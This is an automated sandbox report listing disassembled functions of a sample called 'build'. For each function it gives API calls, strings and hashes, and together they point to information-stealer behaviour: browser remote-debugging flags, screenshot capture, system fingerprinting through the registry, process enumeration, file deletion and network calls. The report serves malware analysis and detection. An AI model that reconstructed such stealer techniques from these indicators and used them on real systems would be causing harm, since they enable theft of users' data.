Function 0040E4B8 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040E4C0

Strings

$|X, xrefs: 0040E5A1
--remote-debugging-port=9223 --profile-directory=", xrefs: 0040E517, 0040E51D, 0040E52A

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: memset
String ID: --remote-debugging-port=9223 --profile-directory="$$|X
API String ID: 2221118986-1363042206
Opcode ID: ae06c8393336b333af05db5f16c75f1a9f5aa79fb8abcf2d5918810fac2cd834
Instruction ID: 3ba3319f07a7289698a11f05052de0d729129f79ef8d96ea643ee3d8260e6b4f
Opcode Fuzzy Hash: ae06c8393336b333af05db5f16c75f1a9f5aa79fb8abcf2d5918810fac2cd834
Instruction Fuzzy Hash: 14219FBAA421009FC754DB68DC91BED77E5BF8A304F084829E815D7311D774AA24CF4A

Function 004224D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

CloseWindow.USER32(?), ref: 00422628

Strings

screenshot.jpg, xrefs: 00422533, 00422539, 00422549, 0042254E

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CloseWindow
String ID: screenshot.jpg
API String ID: 2868366576-673422685
Opcode ID: e872d15220e8eba057b17becdf5ddfe6898de3b7858142cab79ce1faf9401ced
Instruction ID: 1474f4eb416e69a59470140b2970e150b16aab5e9dd82b7fb77fdc4fb0d98ae7
Opcode Fuzzy Hash: e872d15220e8eba057b17becdf5ddfe6898de3b7858142cab79ce1faf9401ced
Instruction Fuzzy Hash: 22414C7AA002049FCB05EFA9DC819DDB7F6FF893147084426E819E7320DB30AE16CB95

Function 0040D684 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(?,?), ref: 0040D775

Strings

$|X, xrefs: 0040D760

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileFindNext
String ID: $|X
API String ID: 2029273394-3892261830
Opcode ID: 56462b0fbece8748853bf203f85b41ac87afc2f3bc7ba4b1a6761b8c2bef3194
Instruction ID: 7bb2ff5dcfc8d279bcf81fe524ae3fa2dc5d0f95ca336393724a20a6615c9046
Opcode Fuzzy Hash: 56462b0fbece8748853bf203f85b41ac87afc2f3bc7ba4b1a6761b8c2bef3194
Instruction Fuzzy Hash: 61317EBA9416089BDB10CFA8DC81AEDB7B5FF84304F05C919DC59A7215EB30BA58CF91

Function 0041FFEF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,DisplayVersion,00000000,?,?), ref: 004200C5

Strings

DisplayVersion, xrefs: 0042009E, 004200A4, 004200C0

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: QueryValue
String ID: DisplayVersion
API String ID: 3660427363-1932467951
Opcode ID: bc48f7ea78afc2e14c4617c34661b2e74e55b1eb1f49095dbd1ba4971cae8f9f
Instruction ID: cf9f5ad6a68376e2735318beace1d251c566c4efb26f65f4e476611a35502c4e
Opcode Fuzzy Hash: bc48f7ea78afc2e14c4617c34661b2e74e55b1eb1f49095dbd1ba4971cae8f9f
Instruction Fuzzy Hash: 562144753042059FD358DB5DDC91F2AB3EABFC5204F08851EA956C3362DBB4A908CB19

Function 0040764D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET ref: 004076CA

Strings

https, xrefs: 004076EB, 004076F1, 004076FD

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: InternetOpen
String ID: https
API String ID: 2038078732-1056335270
Opcode ID: d02382278dad8006a76467c89bb757bc7f4ff210bad68994d93f9964a0b8bbf9
Instruction ID: df26f4550a862e9fd684f022062cfcdb87b4dfc3a6da9a7f5230f916b3431924
Opcode Fuzzy Hash: d02382278dad8006a76467c89bb757bc7f4ff210bad68994d93f9964a0b8bbf9
Instruction Fuzzy Hash: FC218179A002459BC700DF6CED81E9A77F9FF89204B088128EC15D7316E674EE54DB99

Function 0042BF5B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNELBASE(?,?), ref: 0042C012

Strings

%s\%s, xrefs: 0042BF72, 0042BF78, 0042BF99

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileFindNext
String ID: %s\%s
API String ID: 2029273394-4073750446
Opcode ID: 49aec43eedd4154920b4152912b191205ad4e833ef8602dd1c6ae67f7dfd0253
Instruction ID: 7bfc89935805b3c9f140502e9bada0774c28768e2a75f6990908da1cd339226d
Opcode Fuzzy Hash: 49aec43eedd4154920b4152912b191205ad4e833ef8602dd1c6ae67f7dfd0253
Instruction Fuzzy Hash: 6F21FDB25183469BD314DF64DC90FABB3A4FFD5304F048A2CE85883221EB78B659CB95

Function 0041F27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119), ref: 0041F2E3

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0041F2C1, 0041F2C7, 0041F2DD

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: Open
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 71445658-2278330950
Opcode ID: 418cd68d096bd5568328dc315d2750d41cd1f5bd62fd0d55f38de4d56d20cbe7
Instruction ID: 2e25e882f5a7e2b19922bce7a740613f80a7e1c0cd2294e75e808192a13d07e7
Opcode Fuzzy Hash: 418cd68d096bd5568328dc315d2750d41cd1f5bd62fd0d55f38de4d56d20cbe7
Instruction Fuzzy Hash: FAF0C8B57005046FD208DB59EC96E2B73AEDBC2298B19403CF805C7352D6A19C14C625

Function 0041F8D3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119), ref: 0041F939

Strings

HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0041F917, 0041F91D, 0041F933

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: Open
String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0
API String ID: 71445658-1200804856
Opcode ID: 23afe71e29af5ec134437f7a5a39b17a456f09bf968b00ebcd2edf471ecba85c
Instruction ID: afa0995c9104d54c0513139320a2a32bada2c33ac1025a4ee98fc1a0a3f950aa
Opcode Fuzzy Hash: 23afe71e29af5ec134437f7a5a39b17a456f09bf968b00ebcd2edf471ecba85c
Instruction Fuzzy Hash: A9F046B5740104AFD218DF69DC96E3B379EEBC6258F08402CF90AD7352E6B0AC18C768

Function 0041EDD1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32 ref: 0041EE12

Strings

C, xrefs: 0041EDD1

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: InformationVolume
String ID: C
API String ID: 2039140958-1037565863
Opcode ID: fba895a7c84f0ebd10d110c2fb366e73445ea8b94fce1f580e62eef5e5c9b4e0
Instruction ID: 92e8b87a2725497af17e58081da3f9891e214a7b1a9627bcd9299335e7855597
Opcode Fuzzy Hash: fba895a7c84f0ebd10d110c2fb366e73445ea8b94fce1f580e62eef5e5c9b4e0
Instruction Fuzzy Hash: F50171B1C483809FD300EF78DC9899ABBE5AFC5204F09D92DE49987321E674E695CB46

Function 00420499 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,MachineGuid,?,?,?,?), ref: 004204D3

Strings

MachineGuid, xrefs: 004204AE, 004204B4, 004204CD

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: QueryValue
String ID: MachineGuid
API String ID: 3660427363-4186287252
Opcode ID: 559368afa54c67bf8fb2bce8fe083da36d837b0e58ab7d7ce205c408e4ef4464
Instruction ID: 7bd19849ba9bfde11fb18e584a279c445fdcfc572076ffcf1604942d4b869d57
Opcode Fuzzy Hash: 559368afa54c67bf8fb2bce8fe083da36d837b0e58ab7d7ce205c408e4ef4464
Instruction Fuzzy Hash: C8F09637204114AFD314DB4AFCC4D9B77A8FB86214F04043DF6ADC3211E664A919C765

Function 0041F2FF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,?,?,?,?), ref: 0041F336

Strings

CurrentBuildNumber, xrefs: 0041F314, 0041F31A, 0041F32F, 0041F334

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: QueryValue
String ID: CurrentBuildNumber
API String ID: 3660427363-1022791448
Opcode ID: b9f1d27b948a2cde859decee709fabe3fc3aaf7079ba9210fc7bef9a2106faad
Instruction ID: 32cc7c2ada2b86104a3a49f668f9a4e07e20b2ad3b816f2a31f760a166775264
Opcode Fuzzy Hash: b9f1d27b948a2cde859decee709fabe3fc3aaf7079ba9210fc7bef9a2106faad
Instruction Fuzzy Hash: C8F0A7BE6010006FC1049789EC85C5B73AAEBD52157184039F90DC6321D6A5AD15CB28

Function 0041FF59 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?), ref: 0041FF9F

Strings

DisplayName, xrefs: 0041FF7B, 0041FF81, 0041FF9D

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: QueryValue
String ID: DisplayName
API String ID: 3660427363-3786665039
Opcode ID: bc31a2ff1834048140c9dfee421bfaf7d1603ec0065aed378ec0e313bf8dafab
Instruction ID: f5713496be0a026c6677b26d3adc6da17140d2fb9fb8e09341883e6bed890c7d
Opcode Fuzzy Hash: bc31a2ff1834048140c9dfee421bfaf7d1603ec0065aed378ec0e313bf8dafab
Instruction Fuzzy Hash: 4DF09A75700101AFE3148B49DC81F2A73E8ABCA314F08442DF946D7391E6B8ED098BAA

Function 0041F1F3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,?,?), ref: 0041F22B

Strings

ProductName, xrefs: 0041F20D, 0041F213, 0041F229

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: QueryValue
String ID: ProductName
API String ID: 3660427363-3586724618
Opcode ID: 297f8375b1038bb0d3d7efae8f7a8fb007ca2ae3d08dc7cd9e0f1bc1478d321a
Instruction ID: d06dab5c00e1cd9b568c1344ba8a1129501a229b943713cdd63673397a6e7b0d
Opcode Fuzzy Hash: 297f8375b1038bb0d3d7efae8f7a8fb007ca2ae3d08dc7cd9e0f1bc1478d321a
Instruction Fuzzy Hash: 1AF0ECB66400045FC608DB49EC52D7AB79DEBA5214B04003AF908C7321E5A17C158725

Function 0041F955 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,ProcessorNameString,?,?,?,?), ref: 0041F98C

Strings

ProcessorNameString, xrefs: 0041F96A, 0041F970, 0041F985, 0041F98A

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: QueryValue
String ID: ProcessorNameString
API String ID: 3660427363-2160769855
Opcode ID: 31041bb49acb937d4b380fc0fc361d606422b0c06ebdfe4616e1dac201ad4636
Instruction ID: 552663aaeae6f16054e1a020f72e43f719887551d2972acdf4c5440fe477a02d
Opcode Fuzzy Hash: 31041bb49acb937d4b380fc0fc361d606422b0c06ebdfe4616e1dac201ad4636
Instruction Fuzzy Hash: 39E09B7B750104AFC108D74DFC41C67B39DEBD9115B04053AF949C3311D5657D19C664

Function 0041F1A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119), ref: 0041F1DC

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0041F1BA, 0041F1C0, 0041F1D6

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: Open
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 71445658-2278330950
Opcode ID: 476f3307aa02160a5b5e6049588745abe0e09f88a314fee225192767593139a3
Instruction ID: f7d6863b10dd3ef7c86b8c37ee4a6ed4c782ebdb65dcfa4361654b1c1eeb25b1
Opcode Fuzzy Hash: 476f3307aa02160a5b5e6049588745abe0e09f88a314fee225192767593139a3
Instruction Fuzzy Hash: 4FE04FB9B402156BD318DF1AFC52F227258FB52204F190028BD05D7263D69168248958

Function 004234CE Relevance: 3.0, APIs: 2, Instructions: 27processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004234F0
Process32First.KERNEL32(00000000), ref: 004234FD

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CreateFirstProcess32SnapshotToolhelp32
String ID:
API String ID: 2353314856-0
Opcode ID: d0aafe996ae6847ea86accd4ca33bdfc7634bf740571bcb37ff440368e241406
Instruction ID: 227a4079254baf746a4b3145b4eccbe3d1c1d191b7d66606b6d4c0c46632bee1
Opcode Fuzzy Hash: d0aafe996ae6847ea86accd4ca33bdfc7634bf740571bcb37ff440368e241406
Instruction Fuzzy Hash: C7E0DF74301205AFE7A0CB1DEC92F6632E8FBC6348F140038B508CB3C1DA20EC208769

Function 00428E2D Relevance: 3.0, APIs: 2, Instructions: 18COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00428E3B
GetDriveTypeA.KERNEL32 ref: 00428E50

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: DriveTypememset
String ID:
API String ID: 1397174798-0
Opcode ID: b57d072800557abae0a5aa22fb6253ca5f3f77b3917338c5565a3f969117a767
Instruction ID: 05f602f88df0723ab444c59d209778b1bca8aad3002b6ddd03543a7d9dd94d56
Opcode Fuzzy Hash: b57d072800557abae0a5aa22fb6253ca5f3f77b3917338c5565a3f969117a767
Instruction Fuzzy Hash: 86E0867DF402105BD700CB40DD85F9DB375BBE9301F244136E50497345D6B4A9114B44

Function 00410B38 Relevance: 1.6, APIs: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(?,?), ref: 00410C8F

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: e44fe60c8639863d2c315c246c48f04d5d8cfac3e492799677a20636737e1b07
Instruction ID: 774cd959641f09b608a44bffdc7760c736467633c15014411cd55cc47401f3d7
Opcode Fuzzy Hash: e44fe60c8639863d2c315c246c48f04d5d8cfac3e492799677a20636737e1b07
Instruction Fuzzy Hash: 7641487A6001648FC704DFACEDD1A9973B5EF89604F040068EA06D3265EA34FF64CF8A

Function 00401486 Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000), ref: 0040150A

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 1c7cf194b628d9fe7c974d29b3bbdfc55f754b21c85c7efbc48edafab75aaf0e
Instruction ID: 00392d68a53ce9e165726544d2ac5714eebf978426e0d0188d186be6dacfc9ef
Opcode Fuzzy Hash: 1c7cf194b628d9fe7c974d29b3bbdfc55f754b21c85c7efbc48edafab75aaf0e
Instruction Fuzzy Hash: A321E7BAA001099FCB05DFA8DCD19EDB7B1FF89304B04442AE915E7351DB34BA19CB98

Function 00404468 Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON

Download Yara Rule

APIs

InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004044FF

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CrackInternet
String ID:
API String ID: 1381609488-0
